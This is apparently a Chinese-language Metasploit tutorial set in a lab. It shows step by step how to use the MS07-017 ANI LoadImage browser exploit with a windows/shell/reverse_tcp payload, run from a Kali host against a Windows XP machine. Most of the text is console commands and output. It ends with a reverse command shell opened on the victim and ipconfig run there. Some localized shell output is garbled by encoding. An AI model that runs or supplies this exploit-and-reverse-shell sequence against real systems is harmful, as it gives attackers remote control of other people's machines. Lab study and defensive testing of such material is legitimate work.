msf payload使用

一、Passive Exploit（浏览器访问攻击）

环境：

kali :10.0.0.132

windows XP ：10.0.0.106

 

1、创建payload

msf > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize 
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set SRVHOST 10.0.0.132
SRVHOST => 10.0.0.132
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set lhost 10.0.0.132
lhost => 10.0.0.132
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show options

Module options (exploit/windows/browser/ms07_017_ani_loadimage_chunksize):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  10.0.0.132       yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  80               yes       The daemon port to listen on
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /                yes       The URI to use.


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.132       yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista


msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.0.0.132:4444 
[*] Using URL: http://10.0.0.132:80/
[*] Server started.
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) >

　　

2、在windows XP机器上访问

3、查看kali

msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > [*] 10.0.0.106       ms07_017_ani_loadimage_chunksize - Attempting to exploit ani_loadimage_chunksize
[*] 10.0.0.106       ms07_017_ani_loadimage_chunksize - Sending HTML page
[*] 10.0.0.106       ms07_017_ani_loadimage_chunksize - Attempting to exploit ani_loadimage_chunksize
[*] 10.0.0.106       ms07_017_ani_loadimage_chunksize - Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.106
[*] Command shell session 1 opened (10.0.0.132:4444 -> 10.0.0.106:1069) at 2019-05-07 10:00:18 +0800

msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > sessions

Active sessions
===============

  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  1         shell x86/windows               10.0.0.132:4444 -> 10.0.0.106:1069 (10.0.0.106)

msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [°汾 5.1.2600]
(C) °爨?? 1985-2001 Microsoft Corp.

C:\Documents and Settings\admin\??>ipconfig 
ipconfig 

Windows IP Configuration


Ethernet adapter ±??????

        Connection-specific DNS Suffix  . : 
        IP Address. . . . . . . . . . . . : 10.0.0.106
        Subnet Mask . . . . . . . . . . . : 255.0.0.0
        Default Gateway . . . . . . . . . : 10.0.0.254

Ethernet adapter Bluetooth θ?l??

        Media State . . . . . . . . . . . : Media disconnected